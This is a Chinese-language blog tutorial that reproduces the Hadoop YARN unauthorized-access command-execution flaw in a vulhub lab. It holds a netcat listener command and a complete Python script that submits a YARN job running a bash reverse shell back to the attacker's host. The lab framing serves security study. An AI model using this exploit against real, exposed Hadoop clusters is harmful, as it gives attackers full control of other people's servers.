数据库安全:Hadoop 未授权访问-命令执行漏洞.

数据库安全:Hadoop 未授权访问-命令执行漏洞.

Hadoop 未授权访问主要是因为 Hadoop YARN 资源管理系统配置不当,导致可以未经授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过 RESTAPI 部署任务来执行任意指令,最终完全控制服务器。


目录:

[数据库安全:Hadoop 未授权访问-命令执行漏洞.](#数据库安全:Hadoop 未授权访问-命令执行漏洞.)

[Hadoop 未授权访问-命令执行漏洞:](#Hadoop 未授权访问-命令执行漏洞:)

[开启 vulhub 靶场环境:](#开启 vulhub 靶场环境:)

[Hadoop 未授权访问-命令执行漏洞测试:](#Hadoop 未授权访问-命令执行漏洞测试:)


Hadoop 未授权访问-命令执行漏洞:

开启 vulhub 靶场环境:

第一步:切换到 vulhub 目录下

复制代码
cd vulhub

第二步:切换到 hadoop 目录下

复制代码
cd hadoop

第三步:切换到 unauthorized-yarn 漏洞目录下.


第四步:开启 漏洞 服务.

复制代码
docker-compose up -d

第五步:访问 http:// (靶场 IP 地址):8088


Hadoop 未授权访问-命令执行漏洞测试:

第一步:访问 /cluster/apps 页面【如果 该页面存在的话,说明存在未授权访问漏洞】

复制代码
http://192.168.0.106:8088/cluster/apps

第二步:在 攻击机(kali)设置监听.

python 复制代码
nc -nvlp 8888

// 设置 监听 端口为8888

第三步:编写 Python 执行代码.

python 复制代码
import requests

def shell(url,vps_ip,port):
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
    }
    response = requests.post(url+"/ws/v1/cluster/apps/new-application",headers=headers)
    id = response.json()["application-id"]
    data = {
        'application-id': id,
        'application-name': 'getshell',
        'am-container-spec': {
            'commands': {
                'command': '/bin/bash -i >& /dev/tcp/%s/%s 0>&1'%(vps_ip,port)
            },
        },
        'application-type': 'YARN'}
    exploit = requests.post(url+"/ws/v1/cluster/apps",headers=headers,json=data)
    print("[+] 执行完成!")


if __name__ == '__main__':
    url = input("目标的URL:")
    vps_ip = input("监听的主机IP地址(kali):")
    port = input("监听的主机端口(kali):")
    shell(url,vps_ip,port)

执行代码:


第四步:返回 监听的主机查看结果,发现已经成功.


参考文章:Hadoop 漏洞复现_hadoop命令执行漏洞-CSDN博客

学习链接:第55天:服务攻防-数据库安全_Redis_Hadoop_Mysql_未授权访问_RCE_哔哩哔哩_bilibili

相关推荐
前端小巷子43 分钟前
深入解析CSRF攻击
前端·安全·面试
寻觅神话063 小时前
Android 应用常见安全问题
安全·android安全·owasp masvs
车载测试工程师3 小时前
汽车功能安全-嵌入式软件测试(软件合格性测试)【目的、验证输入、集成&验证要求】11
功能测试·网络协议·测试工具·安全·车载系统·汽车·测试覆盖率
心 一5 小时前
Python 类型注解实战:`Optional` 与安全数据处理的艺术
服务器·python·安全
小lo想吃棒棒糖5 小时前
自动驾驶的“安全基石”:NVIDIA如何用技术守护未来出行
人工智能·安全·自动驾驶
码农12138号6 小时前
BUUCTF在线评测-练习场-WebCTF习题[GYCTF2020]Blacklist1-flag获取、解析
web安全·网络安全·ctf·sql注入·handler·buuctf
Linux运维技术栈6 小时前
企业级配置:Azure 邮件与 Cloudflare 域名解析的安全验证落地详解
运维·安全·flask·azure·cloudflare
饶了我吧,放了我吧7 小时前
计算机网络实验——以太网安全实验
计算机网络·安全·php
爱思德学术8 小时前
CCF发布《计算领域高质量科技期刊分级目录(2025年版)》
大数据·网络安全·自动化·软件工程
weixin_443290699 小时前
【云服务器安全相关】堡垒机、WAF、防火墙、IDS 有什么区别?
服务器·安全·php